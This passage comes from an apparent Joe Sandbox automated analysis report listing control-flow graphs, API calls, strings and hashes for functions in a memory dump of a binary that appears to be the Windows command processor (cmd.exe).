646->649 650 7ff744f1e21a 646->650 647->633 653 7ff744f1e201-7ff744f1e210 649->653 654 7ff744f1e1f3-7ff744f1e1f6 649->654 657 7ff744f1e21d-7ff744f1e21f 650->657 655 7ff744f124e9-7ff744f12514 call 7ff744f18f80 651->655 656 7ff744f124dd-7ff744f124e4 ??_V@YAXPEAX@Z 651->656 653->650 659 7ff744f1e212-7ff744f1e218 653->659 654->653 658 7ff744f1e1f8-7ff744f1e1ff 654->658 656->655 657->637 661 7ff744f1e221-7ff744f1e228 657->661 658->653 658->654 659->657 663 7ff744f1e22a-7ff744f1e231 661->663 664 7ff744f1e254-7ff744f1e262 661->664 665 7ff744f1e234-7ff744f1e237 663->665 664->633 665->664 666 7ff744f1e239-7ff744f1e242 665->666 666->664 667 7ff744f1e244-7ff744f1e252 666->667 667->664 667->665
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                              • API String ID: 2622545777-4197029667
                              • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                              • Instruction ID: 97f7f5ecca4f69be744bbb1543b8bdc4c36f124577b2f96df014b3674f19a3c7
                              • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                              • Instruction Fuzzy Hash: F7913F61B0DA86C6EF24BF52D8951B9A3A0FF48B84FC94135CD4E476D9DE3CE9059320
                              Function 00007FF744F10580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleMode_get_osfhandle
                              • String ID: CMD.EXE
                              • API String ID: 1606018815-3025314500
                              • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                              • Instruction ID: 309dece1a9c2304b93f4ee4ccd785fd950191a00393b0ef31c026ed3b4818e58
                              • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                              • Instruction Fuzzy Hash: AF41EE31A0D712CBE704BF56E994578BAA0BB99B56FCC4134CD0E423E8DF3CA454E620
                              Function 00007FF744F0C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 680 7ff744f0c620-7ff744f0c66f GetConsoleTitleW 681 7ff744f1c5f2 680->681 682 7ff744f0c675-7ff744f0c687 call 7ff744f0af14 680->682 685 7ff744f1c5fc-7ff744f1c60c GetLastError 681->685 686 7ff744f0c689 682->686 687 7ff744f0c68e-7ff744f0c69d call 7ff744f0ca40 682->687 688 7ff744f1c5e3 call 7ff744f03278 685->688 686->687 692 7ff744f1c5e8-7ff744f1c5ed call 7ff744f1855c 687->692 693 7ff744f0c6a3-7ff744f0c6ac 687->693 688->692 692->681 695 7ff744f0c6b2-7ff744f0c6c5 call 7ff744f0b9c0 693->695 696 7ff744f0c954-7ff744f0c95e call 7ff744f1291c 693->696 703 7ff744f0c6cb-7ff744f0c6ce 695->703 704 7ff744f0c9b5-7ff744f0c9c9 call 7ff744f15c6c call 7ff744f1855c 695->704 701 7ff744f1c5de-7ff744f1c5e0 696->701 702 7ff744f0c964-7ff744f0c972 call 7ff744f089c0 696->702 701->688 702->685 716 7ff744f0c978-7ff744f0c99a towupper 702->716 703->692 707 7ff744f0c6d4-7ff744f0c6e9 703->707 727 7ff744f0c9d0-7ff744f0c9d7 704->727 708 7ff744f0c6ef-7ff744f0c6fa 707->708 709 7ff744f1c616-7ff744f1c620 call 7ff744f1855c 707->709 712 7ff744f1c627 708->712 713 7ff744f0c700-7ff744f0c713 708->713 709->712 718 7ff744f1c631 712->718 717 7ff744f0c719-7ff744f0c72c 713->717 713->718 721 7ff744f0c9a0-7ff744f0c9a9 716->721 723 7ff744f1c63b 717->723 724 7ff744f0c732-7ff744f0c747 call 7ff744f0d3f0 717->724 718->723 721->721 722 7ff744f0c9ab-7ff744f0c9af 721->722 722->704 725 7ff744f1c60e-7ff744f1c611 call 7ff744f2ec14 722->725 732 7ff744f1c645 723->732 733 7ff744f0c8ac-7ff744f0c8af 724->733 734 7ff744f0c74d-7ff744f0c750 724->734 725->709 730 7ff744f0c9dd-7ff744f1c6da SetConsoleTitleW 727->730 731 7ff744f0c872-7ff744f0c8aa call 7ff744f1855c call 7ff744f18f80 727->731 730->731 741 7ff744f1c64e-7ff744f1c651 732->741 733->734 740 7ff744f0c8b5-7ff744f0c8d3 wcsncmp 733->740 737 7ff744f0c76a-7ff744f0c76d 734->737 738 7ff744f0c752-7ff744f0c764 call 7ff744f0bd38 734->738 744 7ff744f0c840-7ff744f0c84b call 7ff744f0cb40 737->744 745 7ff744f0c773-7ff744f0c77a 737->745 738->692 738->737 740->737 746 7ff744f0c8d9 740->746 747 7ff744f1c657-7ff744f1c65b 741->747 748 7ff744f0c80d-7ff744f0c811 741->748 761 7ff744f0c84d-7ff744f0c855 call 7ff744f0cad4 744->761 762 7ff744f0c856-7ff744f0c85c call 7ff744f07a70 744->762 753 7ff744f0c780-7ff744f0c784 745->753 746->734 747->748 749 7ff744f0c817-7ff744f0c81b 748->749 750 7ff744f0c9e2-7ff744f0c9e7 748->750 755 7ff744f0ca1b-7ff744f0ca1f 749->755 756 7ff744f0c821 749->756 750->749 757 7ff744f0c9ed-7ff744f0c9f7 call 7ff744f1291c 750->757 758 7ff744f0c78a-7ff744f0c7a4 wcschr 753->758 759 7ff744f0c83d 753->759 755->756 763 7ff744f0ca25-7ff744f1c6b3 call 7ff744f03278 755->763 764 7ff744f0c824-7ff744f0c82d 756->764 779 7ff744f0c9fd-7ff744f0ca00 757->779 780 7ff744f1c684-7ff744f1c698 call 7ff744f03278 757->780 766 7ff744f0c7aa-7ff744f0c7ad 758->766 767 7ff744f0c8de-7ff744f0c8f7 758->767 759->744 761->762 777 7ff744f0c862-7ff744f0c86c 762->777 763->692 764->764 770 7ff744f0c82f-7ff744f0c837 764->770 772 7ff744f0c7b0-7ff744f0c7b8 766->772 773 7ff744f0c900-7ff744f0c908 767->773 770->753 770->759 772->772 774 7ff744f0c7ba-7ff744f0c7c7 772->774 773->773 775 7ff744f0c90a-7ff744f0c915 773->775 774->741 781 7ff744f0c7cd-7ff744f0c7db 774->781 782 7ff744f0c917 775->782 783 7ff744f0c93a-7ff744f0c944 775->783 777->727 777->731 779->749 786 7ff744f0ca06-7ff744f0ca10 call 7ff744f089c0 779->786 780->692 787 7ff744f0c7e0-7ff744f0c7e7 781->787 788 7ff744f0c920-7ff744f0c928 782->788 790 7ff744f0ca2a-7ff744f0ca2f call 7ff744f19158 783->790 791 7ff744f0c94a 783->791 786->749 799 7ff744f0ca16-7ff744f1c67f GetLastError call 7ff744f03278 786->799 794 7ff744f0c7e9-7ff744f0c7f1 787->794 795 7ff744f0c800-7ff744f0c803 787->795 796 7ff744f0c92a-7ff744f0c92f 788->796 797 7ff744f0c932-7ff744f0c938 788->797 790->701 791->696 794->795 800 7ff744f0c7f3-7ff744f0c7fe 794->800 795->732 801 7ff744f0c809 795->801 796->797 797->783 797->788 799->692 800->787 800->795 801->748
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleTitlewcschr
                              • String ID: /$:
                              • API String ID: 2364928044-4222935259
                              • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                              • Instruction ID: b8e50f7c11ef059dba6e433afef02a1ff7cde44faf4d7bd46017f958e31c05ea
                              • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                              • Instruction Fuzzy Hash: E2C16F61A1D682C1FB68BF179498279E2A1EF91B50FCD5131DD1E462D9EF3CE844E320
                              Function 00007FF744F07AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 807 7ff744f07aa0-7ff744f07ad9 808 7ff744f07aeb-7ff744f07b38 memset call 7ff744f0ca40 807->808 809 7ff744f07adb-7ff744f07ae5 call 7ff744f1291c 807->809 815 7ff744f1ae4e-7ff744f1ae53 808->815 816 7ff744f07b3e-7ff744f07b6d GetFullPathNameW 808->816 809->808 814 7ff744f1ae3a-7ff744f1ae49 call 7ff744f03278 809->814 826 7ff744f07bb7-7ff744f07bdd call 7ff744f18f80 814->826 818 7ff744f1ae61-7ff744f1ae63 815->818 819 7ff744f07b73-7ff744f07b78 816->819 820 7ff744f1ae55-7ff744f1ae5c GetLastError 816->820 822 7ff744f1af64-7ff744f1af6b call 7ff744f03278 818->822 823 7ff744f1ae68-7ff744f1ae6d 819->823 824 7ff744f07b7e-7ff744f07b91 CreateDirectoryW 819->824 820->818 827 7ff744f1ae74-7ff744f1ae7e call 7ff744f03278 823->827 828 7ff744f07b93-7ff744f07ba7 824->828 829 7ff744f07bdf-7ff744f07bf2 GetLastError 824->829 842 7ff744f1ae84-7ff744f1ae8e 827->842 835 7ff744f07bb5 828->835 836 7ff744f07ba9-7ff744f07bb0 free 828->836 832 7ff744f1ae6f 829->832 833 7ff744f07bf8-7ff744f07bfb 829->833 832->827 833->818 839 7ff744f07c01-7ff744f07c08 833->839 835->826 836->835 840 7ff744f07c0e-7ff744f07c2e 839->840 841 7ff744f1af5f 839->841 840->842 843 7ff744f07c34-7ff744f07c4a 840->843 841->822 842->841 844 7ff744f1ae94-7ff744f1aea4 842->844 845 7ff744f07cd1-7ff744f07ced CreateDirectoryW 843->845 846 7ff744f07c50 843->846 844->841 847 7ff744f1aeaa-7ff744f1aeca 844->847 845->828 848 7ff744f07cf3 845->848 849 7ff744f07cbe-7ff744f07cc1 846->849 852 7ff744f1aecc 847->852 853 7ff744f1aef1-7ff744f1aef5 847->853 854 7ff744f1af46-7ff744f1af54 GetLastError 848->854 850 7ff744f07cc3-7ff744f07cc6 849->850 851 7ff744f07cad-7ff744f07cb0 849->851 856 7ff744f07ca5-7ff744f07cab 850->856 857 7ff744f07cc8 850->857 861 7ff744f07c52-7ff744f07c79 CreateDirectoryW 851->861 862 7ff744f07cb2-7ff744f07cbb 851->862 858 7ff744f1aecf-7ff744f1aed6 852->858 859 7ff744f1aef7-7ff744f1af00 853->859 860 7ff744f1af03-7ff744f1af0b 853->860 854->828 855 7ff744f1af5a 854->855 855->818 856->851 867 7ff744f07cca 856->867 857->861 858->853 863 7ff744f1aed8-7ff744f1aeef 858->863 859->860 860->845 864 7ff744f1af11-7ff744f1af18 860->864 865 7ff744f07c8f-7ff744f07ca0 861->865 866 7ff744f07c7b-7ff744f07c89 GetLastError 861->866 862->849 863->853 863->858 868 7ff744f1af1a-7ff744f1af31 864->868 869 7ff744f1af33-7ff744f1af37 864->869 865->856 866->841 866->865 867->845 868->864 868->869 869->845 870 7ff744f1af3d 869->870 870->854
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CreateDirectoryDriveFullNamePathTypefreememset
                              • String ID:
                              • API String ID: 1445986735-0
                              • Opcode ID: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                              • Instruction ID: 32632971fc774d307bb2d75e1c1323aff88500682a0ec6e8ad495338f62c33bf
                              • Opcode Fuzzy Hash: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                              • Instruction Fuzzy Hash: 3A917362A0CB82C6EB65BF1294846B9F3A1FB84B85F898135DD4D077D8DF3CD940A720
                              Function 00007FF744F18D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                              • String ID:
                              • API String ID: 4291973834-0
                              • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                              • Instruction ID: a975b078e1f409cfba208c3e6e3cb99acd71dbf43d12ad3d933532e75396944f
                              • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                              • Instruction Fuzzy Hash: 4A41A031A0CA02C6FB50BF52EAC0279A2A5AB54784FC84535DD4D876E8DF7CEC94A760
                              Function 00007FF744F14A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                              • memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                              • String ID:
                              • API String ID: 1623332820-0
                              • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                              • Instruction ID: bdb44c50045fdb1e58795b7cba7463e67017244e6ce5f0ba37a7d60873be03ed
                              • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                              • Instruction Fuzzy Hash: C0119122A1C742C2DB10BF02A454039FBB0EB89F80B9D9035DE4E03788DE3DE8419760
                              Function 00007FF744F0CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset
                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                              • API String ID: 2221118986-3416068913
                              • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                              • Instruction ID: d68bab9a3694ba35ec607accdd3fd8a8cbd7a44ef28edcdee22fa909431904d6
                              • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                              • Instruction Fuzzy Hash: B011C621A0D682C1EB54FF57A1D42B992A09F84BA4F9C4331DE6D4B7DDEE2CD480A320
                              Function 00007FF744F0BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 958 7ff744f0be00-7ff744f0be15 959 7ff744f0befb-7ff744f0befd 958->959 960 7ff744f0be1b-7ff744f0be22 958->960 962 7ff744f0bed2-7ff744f0bee2 959->962 960->959 961 7ff744f0be28-7ff744f0be2b 960->961 961->959 963 7ff744f0be31-7ff744f0be45 961->963 964 7ff744f0be47-7ff744f0be69 memset call 7ff744f0bff0 963->964 965 7ff744f0be6b-7ff744f0be6d 963->965 964->965 974 7ff744f0beaf-7ff744f0beb6 964->974 967 7ff744f0bf20-7ff744f0bf23 965->967 968 7ff744f0be73-7ff744f0be79 965->968 967->968 969 7ff744f0bf29-7ff744f0bf39 call 7ff744f0cd90 967->969 971 7ff744f0be7b-7ff744f0be89 968->971 972 7ff744f0be92-7ff744f0be9a 968->972 969->974 986 7ff744f0bf3f-7ff744f0bf42 969->986 971->972 975 7ff744f0be8b-7ff744f0be90 971->975 976 7ff744f0be9c call 7ff744f0c620 972->976 977 7ff744f0bee4-7ff744f0bef9 972->977 979 7ff744f0bec8-7ff744f0beca 974->979 980 7ff744f0beb8-7ff744f0bec3 call 7ff744f0bff0 974->980 975->972 982 7ff744f0bf0c-7ff744f0bf18 call 7ff744f0b0d8 975->982 984 7ff744f0bea1-7ff744f0bead 976->984 977->984 979->962 980->979 982->972 992 7ff744f0bf1e 982->992 984->974 989 7ff744f0beff-7ff744f0bf03 984->989 990 7ff744f0bf9e-7ff744f0bfab call 7ff744f071ec 986->990 991 7ff744f0bf44-7ff744f0bf5d call 7ff744f088a8 986->991 989->974 995 7ff744f0bf05-7ff744f0bf0a call 7ff744f0af98 989->995 990->974 999 7ff744f0bfb1-7ff744f0bfc1 call 7ff744f0cd90 990->999 991->990 1000 7ff744f0bf5f-7ff744f0bf73 call 7ff744f10a6c 991->1000 992->974 995->974 999->974 1006 7ff744f0bfc7-7ff744f0bfe1 call 7ff744f1081c 999->1006 1000->990 1007 7ff744f0bf75-7ff744f0bf81 call 7ff744f0b0d8 1000->1007 1006->1007 1007->974 1012 7ff744f0bf87-7ff744f0bf99 call 7ff744f15ad8 1007->1012 1012->984
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memsetwcschr
                              • String ID: 2$COMSPEC
                              • API String ID: 1764819092-1738800741
                              • Opcode ID: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                              • Instruction ID: be28c3af4466759b3fa88b8c37f47ddfd7a375fcf8d5c6c9d531115607d5ed44
                              • Opcode Fuzzy Hash: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                              • Instruction Fuzzy Hash: 36516921A1C643C5FB64BFA3A4C9379E2919FC5B84F8C4031DE0D4A6DEDE2CF844A661
                              Function 00007FF744F19A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Concurrency::cancel_current_taskmalloc
                              • String ID:
                              • API String ID: 1412018758-0
                              • Opcode ID: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                              • Instruction ID: 5a6b0ad1117d7046d1347a568a92a52e0f9609c87e45a28278a71ca1e95f116d
                              • Opcode Fuzzy Hash: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                              • Instruction Fuzzy Hash: 79E03240E0E20BC2FB283FA368C257892605F18B40F8C2430CD0D4A7CEEE2DA895E270
                              Function 00007FF744F0CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                              • Instruction ID: d10e3ccbb626919f7bc1ad86611c1fe8da04576b537b1b4bc2b994ad73cea7e5
                              • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                              • Instruction Fuzzy Hash: 95F01D31A1C642C6EB14BF16F884578F7A0FB99B40B9C9434DE4E03398DF3CA441E610
                              Function 00007FF744F14C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: exit
                              • String ID:
                              • API String ID: 2483651598-0
